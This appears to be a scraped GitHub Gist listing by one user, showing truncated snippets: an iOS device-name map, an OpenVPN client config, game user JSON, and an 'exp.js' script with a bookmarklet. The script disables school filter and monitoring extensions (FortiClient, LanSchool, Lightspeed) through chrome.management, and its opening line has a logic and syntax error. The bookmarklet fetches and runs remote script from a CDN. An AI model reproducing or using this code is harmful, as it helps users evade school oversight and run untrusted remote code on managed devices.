Skip to content

Instantly share code, notes, and snippets.

@rusprice
rusprice / commonNames.json
Last active July 9, 2024 04:33
iOS and iPadOS device identifiers to common names
{
"iPad13,18": "iPad (10th generation)",
"iPad13,19": "iPad (10th generation)",
"iPad3,1": "iPad (3rd generation)",
"iPad3,2": "iPad (3rd generation)",
"iPad3,3": "iPad (3rd generation)",
"iPad3,4": "iPad (4th generation)",
"iPad3,5": "iPad (4th generation)",
"iPad3,6": "iPad (4th generation)",
"iPad6,11": "iPad (5th generation)",
client
dev tun
proto tcp
remote 45.55.71.229 80
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
auth SHA512
@rusprice
rusprice / exp.js
Last active October 18, 2022 14:23
if (!window.location.hostname == "chrome.google.com") return window.location.replace("https://chrome.google.com/jailbreak");
chrome.management.getAll(async function(extensions) {
extensions.filter(extension => extension.name == "FortiClient Chromebook WebFilter Extension" || extension.name == "LanSchool Air Extension for Chromebooks" || extension.name == "Lightspeed Filter Agent" || extension.name == "LanSchool Air for Chromebooks").forEach((extension, i) => {
chrome.management.setEnabled(extension.id, false);
if (i == 3) {
document.head.innerHTML = "";
document.body.innerHTML = "<h1>Filter & LanSchool Disabled</h1>";
}
});
});
(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
{
"viewers": [{
"userId": 756448,
"username": "SuperScopeSix",
"avatarUrl": "https://cdn.prod.hype.space/72x72/a/756448-xZYrpR",
"viewerState": "playing"
},
{
"userId": 1231464,
"username": "amdq2112",
{
"data": [{
"userId": 26660115,
"username": "ufuffjfuf",
"avatarUrl": "https://cdn.prod.hype.space/72x72/a/26660115-00fqRh",
"isConnected": false,
"isAlive": false,
"ts": 1590195965694
},
{